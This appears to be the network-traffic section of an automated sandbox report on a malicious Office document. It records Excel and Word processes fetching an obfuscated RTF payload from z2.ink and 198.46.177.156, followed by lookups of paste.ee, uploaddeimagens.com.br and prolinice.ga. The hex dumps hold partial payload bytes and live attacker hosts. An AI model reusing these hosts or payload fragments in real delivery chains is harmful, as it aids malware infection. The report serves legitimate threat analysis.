                                  May 27, 2024 18:36:09.622627020 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622658968 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622667074 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.622698069 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622746944 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.622881889 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622910976 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622956991 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.622960091 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.622994900 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623042107 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623096943 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623131037 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623163939 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623171091 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623197079 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623230934 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623239994 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623567104 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623600960 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623610973 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623635054 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623667955 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623676062 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623701096 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623733997 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623745918 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623768091 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623800993 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623809099 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623835087 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623867035 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623881102 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.623902082 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.623949051 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.624264002 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624296904 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624330044 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624345064 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.624362946 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624397993 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624404907 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.624430895 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624466896 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624471903 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.624495983 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.624545097 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.642219067 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642393112 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642405987 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642421007 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642436981 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642440081 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.642453909 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642460108 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.642493010 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.642549038 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642565012 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.642601967 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.651592970 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651617050 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651631117 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651662111 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.651787996 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651803017 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651818037 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651830912 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.651858091 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.651913881 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:09.651957035 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.652192116 CEST4917680192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:09.657042027 CEST804917677.232.129.190192.168.2.22
                                  May 27, 2024 18:36:17.017316103 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:17.023359060 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:17.023425102 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:17.026357889 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:17.026417971 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:17.032160044 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:17.032202959 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:17.032593012 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:18.009824038 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:18.011038065 CEST804917777.232.129.190192.168.2.22
                                  May 27, 2024 18:36:18.011109114 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:18.015825987 CEST4917780192.168.2.2277.232.129.190
                                  May 27, 2024 18:36:18.021311998 CEST804917777.232.129.190192.168.2.22
                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2024 18:35:10.698960066 CEST5456253192.168.2.228.8.8.8
                                  May 27, 2024 18:35:10.715420961 CEST53545628.8.8.8192.168.2.22
                                  May 27, 2024 18:35:13.008763075 CEST5291753192.168.2.228.8.8.8
                                  May 27, 2024 18:35:13.016000986 CEST53529178.8.8.8192.168.2.22
                                  May 27, 2024 18:35:15.581310987 CEST6275153192.168.2.228.8.8.8
                                  May 27, 2024 18:35:15.598093033 CEST53627518.8.8.8192.168.2.22
                                  May 27, 2024 18:35:15.599875927 CEST5789353192.168.2.228.8.8.8
                                  May 27, 2024 18:35:15.615236998 CEST53578938.8.8.8192.168.2.22
                                  May 27, 2024 18:35:19.994371891 CEST5482153192.168.2.228.8.8.8
                                  May 27, 2024 18:35:20.008498907 CEST53548218.8.8.8192.168.2.22
                                  May 27, 2024 18:35:20.010200977 CEST5471953192.168.2.228.8.8.8
                                  May 27, 2024 18:35:20.022335052 CEST53547198.8.8.8192.168.2.22
                                  May 27, 2024 18:35:26.430906057 CEST4988153192.168.2.228.8.8.8
                                  May 27, 2024 18:35:26.441282034 CEST53498818.8.8.8192.168.2.22
                                  May 27, 2024 18:35:31.720659971 CEST5499853192.168.2.228.8.8.8
                                  May 27, 2024 18:35:31.732058048 CEST53549988.8.8.8192.168.2.22
                                  May 27, 2024 18:36:07.726792097 CEST5278153192.168.2.228.8.8.8
                                  May 27, 2024 18:36:07.828253031 CEST53527818.8.8.8192.168.2.22
                                  May 27, 2024 18:36:07.853092909 CEST6392653192.168.2.228.8.8.8
                                  May 27, 2024 18:36:08.142760992 CEST53639268.8.8.8192.168.2.22
                                  May 27, 2024 18:36:16.764548063 CEST6551053192.168.2.228.8.8.8
                                  May 27, 2024 18:36:16.862154007 CEST53655108.8.8.8192.168.2.22
                                  May 27, 2024 18:36:16.887022018 CEST6267253192.168.2.228.8.8.8
                                  May 27, 2024 18:36:17.012178898 CEST53626728.8.8.8192.168.2.22
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  May 27, 2024 18:35:10.698960066 CEST192.168.2.228.8.8.80xe3f3Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:13.008763075 CEST192.168.2.228.8.8.80xe102Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:15.581310987 CEST192.168.2.228.8.8.80x79beStandard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:15.599875927 CEST192.168.2.228.8.8.80xe129Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:19.994371891 CEST192.168.2.228.8.8.80x1100Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:20.010200977 CEST192.168.2.228.8.8.80x2664Standard query (0)z2.inkA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:26.430906057 CEST192.168.2.228.8.8.80x69ccStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:31.720659971 CEST192.168.2.228.8.8.80xcaceStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:07.726792097 CEST192.168.2.228.8.8.80x575cStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:07.853092909 CEST192.168.2.228.8.8.80xebecStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:16.764548063 CEST192.168.2.228.8.8.80x99c8Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:16.887022018 CEST192.168.2.228.8.8.80xdab1Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  May 27, 2024 18:35:10.715420961 CEST8.8.8.8192.168.2.220xe3f3No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:13.016000986 CEST8.8.8.8192.168.2.220xe102No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:15.598093033 CEST8.8.8.8192.168.2.220x79beNo error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:15.615236998 CEST8.8.8.8192.168.2.220xe129No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:20.008498907 CEST8.8.8.8192.168.2.220x1100No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:20.022335052 CEST8.8.8.8192.168.2.220x2664No error (0)z2.ink54.241.153.192A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:26.441282034 CEST8.8.8.8192.168.2.220x69ccNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:26.441282034 CEST8.8.8.8192.168.2.220x69ccNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:31.732058048 CEST8.8.8.8192.168.2.220xcaceNo error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                                  May 27, 2024 18:35:31.732058048 CEST8.8.8.8192.168.2.220xcaceNo error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:07.828253031 CEST8.8.8.8192.168.2.220x575cNo error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:08.142760992 CEST8.8.8.8192.168.2.220xebecNo error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:16.862154007 CEST8.8.8.8192.168.2.220x99c8No error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                  May 27, 2024 18:36:17.012178898 CEST8.8.8.8192.168.2.220xdab1No error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false
                                  • paste.ee
                                  • uploaddeimagens.com.br
                                  • z2.ink
                                  • 198.46.177.156
                                  • aikpfjvjuwcsxfjs.net
                                    • prolinice.ga
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.224916154.241.153.192802772C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:10.727703094 CEST317OUTGET /nXPJ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: z2.ink
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:11.326527119 CEST580INHTTP/1.1 301 Moved Permanently
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                  Date: Mon, 27 May 2024 16:35:07 GMT
                                  Content-Length: 89
                                  Content-Encoding: gzip
                                  Vary: Accept-Encoding
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Connection: keep-alive
                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 0b c9 c8 2c 56 08 48 4c 4f 55 f0 48 2c 4b 55 f0 cd 2f 4b 4d b1 d1 87 c8 d9 e8 83 55 72 d9 24 e5 a7 54 82 f4 19 e2 50 0e 94 e0 b2 d1 87 aa d2 07 db 02 00 30 39 f0 91 6c 00 00 00
                                  Data Ascii: (HML),I,VHLOUH,KU/KMUr$TP09l


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.2249162198.46.177.156802772C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:11.337543011 CEST466OUTGET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 198.46.177.156
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:12.002454042 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:11 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                  Last-Modified: Sun, 26 May 2024 17:14:39 GMT
                                  ETag: "70ea-6195e893196e9"
                                  Accept-Ranges: bytes
                                  Content-Length: 28906
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/msword
                                  Data Raw: 7b 5c 72 74 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 66 6f 6e 74 69 6e 66 6f 32 35 30 35 36 39 31 36 30 20 5c 22 7d 0d 7b 5c 33 39 38 35 31 39 32 31 33 26 5d 2f 33 a7 b0 60 2b 35 36 3f 3f 5e 3f 32 29 34 2f 5f 7e 36 21 2c 3f 5f 26 31 2f 26 36 5d 3d a7 b5 39 3a 33 5d 38 2a 2f 7c 2e 3c 60 26 b0 3a 23 28 b0 34 31 a7 5f 2b 37 25 33 35 32 7c 31 29 34 3f 34 5e 5f 40 2e 3c 7e b5 2e 60 2a 25 40 32 2f 25 3f 34 2b 26 36 25 39 a7 b5 3f 3f 7e 32 3a 3f 30 3f 21 2a 33 33 2e 24 30 60 21 38 38 5d 3f 33 30 a7 21 3f 3f 3c 5b 3f 25 24 28 24 3c 3f 33 2c 3f 2f b0 25 21 2f 34 32 35 3f 30 25 29 39 2d 25 40 2f 31 31 7e 3f 3f 36 30 25 31 34 2a 38 2e 2d 39 24 3f 23 3f 34 b0 5e 30 2d 36 5d 37 32 3f 39 40 33 31 37 2a 24 7c 5b 33 2d 29 3a 33 3f 60 35 37 b0 b5 21 a7 26 3c 2d a7 b5 38 2f 40 31 35 5d 5f 7c 2d 2b b0 38 38 3f 33 24 3f 3b 35 3f 2f 2d 2c 30 29 60 2a 2c b5 2b 40 31 21 21 3c 26 26 33 25 28 28 32 31 7e 36 25 3a 37 3f 2d 3f 3f 28 b5 23 21 b5 35 5f 24 a7 2f 24 26 24 29 a7 3e 7e 25 28 2b 3b 3f 28 7c a7 2f 60 27 30 29 36 7e 60 [TRUNCATED]
                                  Data Ascii: {\rt{\*\fontinfo250569160 \"}{\398519213&]/3`+56??^?2)4/_~6!,?_&1/&6]=9:3]8*/|.<`&:#(41_+7%352|1)4?4^_@.<~.`*%@2/%?4+&6%9??~2:?0?!*33.$0`!88]?30!??<[?%$($<?3,?/%!/425?0%)9-%@/11~??60%14*8.-9$?#?4^0-6]72?9@317*$|[3-):3?`57!&<-8/@15]_|-+88?3$?;5?/-,0)`*,+@1!!<&&3%((21~6%:7?-??(#!5_$/$&$)>~%(+;?(|/`'0)6~`'%3*`.,%#==.'[?!?50:%$,|$=&`??%8)532%9^~^*?#?64:3|-^%#71.7$?_??@)9?=181$<*;$/7,?-%28]=~0408!][/8?22)[?;)|-)1*_+4.@`(+?+#>=]:%4+0!!$*6;?3)1+?&)2)2][#:13?<1?0$?+79/%8''~.1!>@-|^&3':??~?0?)9*@1#&(~68*(@05;;:4~?^@#)'5][)#,6/'@[|6)!%,_>:@~%,$`?%|(*2@3:%414^%^./#>!%`$&_:9!#+;?*',63'*?`&?-:>_<?+='?*2=59:[%0..?*|[/.47?+,(%`)19.97'),_@?_%_$/?+>,]7]+=7/.?#:[*07;1^2]2[46#%;8?0`?/??(,?]7]?|6<;%;<-~]&$%0*')^+;24[+[;53/@8_?|?5_?4%_).92~@-3,'!9)57?>-^@1+5<][6<!&22?*2_16/1|>^;%;%@8#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;~$>93!+.-!?'17?_/*?8.1???(%+
                                  May 27, 2024 18:35:12.002532959 CEST224INData Raw: 3f 3f 7c 3e 3c 2c 38 31 40 36 31 3c 7e 21 3f b5 2f 27 5d 7e 5e 37 34 38 35 3e 24 28 29 a7 2d 3f 3c 34 5e 2e b0 29 33 3a 2e 32 2e b5 29 26 34 38 2f 29 3f 3e 3b b5 2c 21 29 37 27 27 3f b0 27 5d 36 b5 39 34 3b 2b 21 2d 3f 3f 39 24 28 a7 39 3f 2e 7c
                                  Data Ascii: ??|><,81@61<~!?/']~^7485>$()-?<4^.)3:.2.)&48/)?>;,!)7''?']694;+!-??9$(9?.|11=?,!),+<:+]6?~+.7)`^[^9!-3),!?>?[|%|.)@&%%9=?=:5[0!3#%?^!@|9#@?(0'>[(0--*'~(??!*`6?>~%?(-|&_3765+8?%:#|-??+.%+<9)>??_5:/1(='%$?]?|&
                                  May 27, 2024 18:35:12.002616882 CEST1236INData Raw: 3c 30 7e 5b 28 b5 3f 7c 3d b5 a7 3f 3f 25 2d 37 5d 25 37 2f 3c 3f b5 30 36 3f 25 a7 24 2f 39 2f 3f 3a 5d 40 3f 7e 2d 2c 27 27 21 2f 24 31 3f 2f 3a 35 7c 5b 21 3f 3a 34 3e 60 7c 3f 31 2e 38 3f 34 3a 2d 5d 7c 2c 28 29 2c 3f 7c 3e 2e 33 3f 38 24 40
                                  Data Ascii: <0~[(?|=??%-7]%7/<?06?%$/9/?:]@?~-,''!/$1?/:5|[!?:4>`|?1.8?4:-]|,(),?|>.3?8$@88?<-8.0'<??>~)#']_%0*?:)=>*,#2^98!4|+/#?_?*$+?()#^48.?9%?7@;9???+~*0+#?>15#,$?_!3'%2>>((%-%>[|:,%6=)|%::3^^(2@7-32/.|?0&60%25+$%@^690]??^$?$#/428^3*`6!??
                                  May 27, 2024 18:35:12.002652884 CEST1236INData Raw: 20 20 20 20 20 09 09 20 20 09 20 20 20 09 30 30 30 34 0d 0d 0a 0a 0d 0a 0a 0d 35 37 0a 0d 0d 0d 0d 0a 0a 0d 31 35 09 09 09 09 20 09 20 20 20 20 20 20 20 20 09 09 20 20 09 20 20 20 09 35 20 20 20 20 09 20 09 20 20 09 20 09 09 09 09 20 09 09 09 20
                                  Data Ascii: 00045715 5 4 15 4696f4e 2e 33000
                                  May 27, 2024 18:35:12.002690077 CEST1236INData Raw: 32 09 09 20 20 09 09 09 09 09 09 09 20 09 20 09 09 09 20 09 09 20 09 09 38 66 34 31 0d 0d 0a 0a 0d 0d 0d 0d 62 37 34 35 34 33 0d 0d 0a 0a 0d 0d 0d 0d 30 09 09 20 09 20 20 09 09 09 09 09 20 09 20 09 09 09 20 09 09 20 09 09 30 09 09 20 09 09 09 20
                                  Data Ascii: 2 8f41b745430 0 e1e8780 a 04f 924e11108a44a08
                                  May 27, 2024 18:35:12.002727032 CEST1236INData Raw: 20 09 09 20 09 64 09 09 20 20 20 09 09 09 20 09 09 20 09 20 09 20 09 20 20 09 09 20 09 36 39 39 09 09 20 09 09 20 09 20 20 20 09 09 09 20 09 20 09 20 20 09 09 20 09 63 66 09 09 20 20 20 09 09 20 09 09 09 09 09 20 09 20 09 20 20 09 09 20 09 65 20
                                  Data Ascii: d 699 cf e 11caf3e5bd 510a7 b 869 0
                                  May 27, 2024 18:35:12.002763033 CEST1236INData Raw: 09 09 20 20 09 09 62 33 09 09 20 09 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 20 09 09 66 0a 0a 0d 0a 0a 0a 0d 0d 64 30 20 09 20 09 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 20 09 09 66 20 09 09 09 20 20 09 09 20 20 20 09 20 09 09 20
                                  Data Ascii: b3 fd0 f 1 0f30ef6502 aeb 46eb696
                                  May 27, 2024 18:35:12.002798080 CEST1236INData Raw: 38 64 62 0a 0a 0a 0d 0a 0d 0d 0d 66 20 09 09 20 09 09 09 09 20 20 20 20 09 20 20 09 20 09 20 20 20 20 09 35 30 33 0a 0d 0d 0d 0a 0d 0d 0d 63 09 20 09 20 09 09 09 09 20 20 20 20 09 20 20 09 20 09 20 20 20 20 09 30 30 30 09 20 20 09 09 09 09 09 09
                                  Data Ascii: 8dbf 503c 000 05f5b9 d e bdfeb ca e
                                  May 27, 2024 18:35:12.002831936 CEST1236INData Raw: 09 20 20 20 20 09 09 09 20 09 09 34 34 30 20 20 09 20 20 20 20 20 20 20 20 09 09 20 20 20 20 09 09 09 20 09 09 33 38 35 30 38 37 09 20 20 09 09 20 20 09 20 09 09 09 09 20 20 20 20 09 09 09 20 09 09 30 09 20 20 09 09 20 20 09 20 09 09 09 09 20 20
                                  Data Ascii: 440 385087 0 c0 d41b704c 71 4ca96 a48
                                  May 27, 2024 18:35:12.002868891 CEST1236INData Raw: 20 09 09 20 20 09 09 32 0a 0d 0a 0a 0a 0a 0a 0d 31 09 09 09 20 20 09 20 09 09 20 20 09 20 09 20 09 20 09 09 20 20 09 09 61 09 20 09 20 20 20 20 20 20 09 09 20 20 20 09 09 09 20 20 20 20 09 09 38 09 09 20 20 09 20 20 20 20 09 09 09 20 20 09 09 09
                                  Data Ascii: 21 a 8 c 276669 1ad2 320 e1ea18
                                  May 27, 2024 18:35:12.007945061 CEST1236INData Raw: 09 09 09 09 09 09 20 20 09 20 09 39 0a 0d 0d 0a 0d 0d 0d 0a 31 31 0a 0d 0d 0a 0d 0d 0d 0a 63 20 20 09 09 09 20 09 09 20 20 20 09 20 20 09 20 20 09 09 20 09 20 09 34 0d 0d 0d 0a 0d 0d 0d 0a 65 30 65 0a 0a 0d 0a 0d 0d 0d 0a 36 62 0d 0a 0a 0a 0a 0a
                                  Data Ascii: 911c 4e0e6b1fc8ce e2 40 adb1d 1


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.224916354.241.153.192801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:13.028472900 CEST128OUTOPTIONS / HTTP/1.1
                                  User-Agent: Microsoft Office Protocol Discovery
                                  Host: z2.ink
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:13.630913973 CEST1236INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Date: Mon, 27 May 2024 16:35:13 GMT
                                  Content-Length: 102317
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Connection: keep-alive
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                  May 27, 2024 18:35:13.630934000 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                  Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
                                  May 27, 2024 18:35:13.631000042 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
